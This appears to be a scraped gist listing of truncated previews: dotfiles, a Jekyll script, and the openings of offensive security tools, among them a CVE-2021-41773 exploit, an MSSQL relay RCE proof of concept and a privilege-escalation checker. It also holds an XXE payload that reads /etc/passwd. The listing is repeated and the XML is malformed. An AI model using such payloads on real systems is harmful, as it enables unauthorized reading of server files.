Slayer slayerlab

## newpost.sh
#!/bin/bash

JEKYLL_PATH="YOUR_JEKYLL_PATH"
POST_DATE=$(date +%Y-%m-%d)
TITLE=$1
FILENAME="$POST_DATE-${TITLE//\ /-}" || ""
[[ -z "$TITLE" ]] \
	&& {
		echo >&2 "[!] Filename not set." \
		&& exit 1;

## CVE-2021-41773.go
package main

import (
    "fmt"
    "flag"
    "net/http"
    "io/ioutil"
    "strings"
    "os"
)

## .zshrc
# Check your environment locale:
# $ env | grep 'LANG'
# GDM_LANG=en_US.utf8
# LANG=en_US.UTF-8
# LANGUAGE=en_US.UTF-8

# Adjust ~/.zshrc
# [snippet]
if [[ "$color_prompt" = yes ]]; then
    PROMPT=$'%F{%(#.blue.green)}┌──${debian_chroot:+($debian_chroot)──}(%B%F{%(#.red.blue)}%n%(#.💀.💣)%m%b%F{%(#.blue.green)})-[%B%F{reset}%(6~.%-1~/…/%4~.%5~)%b%F{%(#.blue.green)}]\n└─%B%(#.%F{red}#.%F{blue}$)%b%F{reset} '

## bad_sequel.py
#!/usr/bin/env python

# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC

# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use

## .tmux
# List of plugins
# Reference: https://github.com/tmux-plugins/tpm
set -g @plugin 'tmux-plugins/tpm'
set -g @plugin 'tmux-plugins/tmux-sensible'

# Personal plugins
set -g @plugin 'tmux-plugins/tmux-logging'

# Remap prefix to screens
set -g prefix C-q

## linuxprivchecker3.py
#!/usr/env python3

###############################################################################################################
# [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
# [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
# [Edited]: Slayer @ May 17, 2019
# -------------------------------------------------------------------------------------------------------------
# [Details]:
# This script is intended to be executed locally on a Linux box to enumerate basic system info and
# search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text

## MeteorMiner.js
// ==UserScript==
// @name         Meteor Miner
// @namespace    MeteorMiner
// @version      0.2
// @description  Extract data form Meteor
// @author       Tim Medin (Counter Hack)
// @match        http://*/*
// @match        https://*/*
// @require      https://code.jquery.com/jquery-3.1.1.min.js
// @require      https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js

## xxe.xml
<?xml version="1.0"?>
<!DOCTYPE data [
!ELEMENT data (x)>
!ENTITY file SYSTEM "/etc/passwd"
]>
<RequiredRootXMLNode>
  <RequiredChildXMLNode>&file;</RequiredChildXMLNode>
</RequiredRootXMLNode>

## .bashrc
export PS1="[\[$(tput sgr0)\]\[\033[38;5;14m\]\t\[$(tput sgr0)\]\[\033[38;5;15m\] \u@\h:\[$(tput sgr0)\]\[\033[38;5;10m\]\w\[$(tput sgr0)\]\[\033[38;5;15m\]]\n\\$ \[$(tput sgr0)\]"

## 1-12.c
/* *
 * From: C Answer Book
 *  Clovis L. Tondo
 *  Scott E. Gimpel
 * ISBN: 7-302-02728-5
 * */
#include <stdio.h>

#define IN   1   /* inside word  */
#define OUT  0   /* outside word */
	#!/bin/bash

	JEKYLL_PATH="YOUR_JEKYLL_PATH"
	POST_DATE=$(date +%Y-%m-%d)
	TITLE=$1
	FILENAME="$POST_DATE-${TITLE//\ /-}" \|\| ""
	[[ -z "$TITLE" ]] \
	&& {
	echo >&2 "[!] Filename not set." \
	&& exit 1;
	package main

	import (
	"fmt"
	"flag"
	"net/http"
	"io/ioutil"
	"strings"
	"os"
	)
	# Check your environment locale:
	# $ env \| grep 'LANG'
	# GDM_LANG=en_US.utf8
	# LANG=en_US.UTF-8
	# LANGUAGE=en_US.UTF-8

	# Adjust ~/.zshrc
	# [snippet]
	if [[ "$color_prompt" = yes ]]; then
	PROMPT=$'%F{%(#.blue.green)}┌──${debian_chroot:+($debian_chroot)──}(%B%F{%(#.red.blue)}%n%(#.💀.💣)%m%b%F{%(#.blue.green)})-[%B%F{reset}%(6~.%-1~/…/%4~.%5~)%b%F{%(#.blue.green)}]\n└─%B%(#.%F{red}#.%F{blue}$)%b%F{reset} '
	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use
	# List of plugins
	# Reference: https://github.com/tmux-plugins/tpm
	set -g @plugin 'tmux-plugins/tpm'
	set -g @plugin 'tmux-plugins/tmux-sensible'

	# Personal plugins
	set -g @plugin 'tmux-plugins/tmux-logging'

	# Remap prefix to screens
	set -g prefix C-q
	#!/usr/env python3

	###############################################################################################################
	# [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
	# [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
	# [Edited]: Slayer @ May 17, 2019
	# -------------------------------------------------------------------------------------------------------------
	# [Details]:
	# This script is intended to be executed locally on a Linux box to enumerate basic system info and
	# search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
	// ==UserScript==
	// @name Meteor Miner
	// @namespace MeteorMiner
	// @version 0.2
	// @description Extract data form Meteor
	// @author Tim Medin (Counter Hack)
	// @match http:///
	// @match https:///
	// @require https://code.jquery.com/jquery-3.1.1.min.js
	// @require https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js
	<?xml version="1.0"?>
	<!DOCTYPE data [
	!ELEMENT data (x)>
	!ENTITY file SYSTEM "/etc/passwd"
	]>
	<RequiredRootXMLNode>
	<RequiredChildXMLNode>&file;</RequiredChildXMLNode>
	</RequiredRootXMLNode>
	/* *
	* From: C Answer Book
	* Clovis L. Tondo
	* Scott E. Gimpel
	* ISBN: 7-302-02728-5
	* */
	#include <stdio.h>

	#define IN 1 /* inside word */
	#define OUT 0 /* outside word */